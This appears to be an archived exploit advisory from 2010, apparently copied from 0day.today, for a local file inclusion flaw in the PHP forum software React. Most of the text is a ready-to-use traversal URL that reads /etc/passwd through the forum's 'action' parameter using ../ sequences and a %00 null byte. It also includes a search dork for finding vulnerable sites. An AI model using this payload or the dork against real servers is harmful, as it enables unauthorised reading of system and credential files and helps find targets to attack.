id: 11514
date: 03/30/2010
title: React software local file inclusion Vulnerability
author: SNK
cves: 

=================================================
React software local file inclusion Vulnerability
=================================================

React software [local file inclusion]
 
- date: 29.03.2010
 
- author: SNK
- language: php
- page: http://react.nl
- vuln: http://page/forum/list_message/index.php?action=../../../../../../../../../../../../../etc/passwd%00
- dork: Powered by React - www.react.nl



#  0day.today [2023-03-24]  #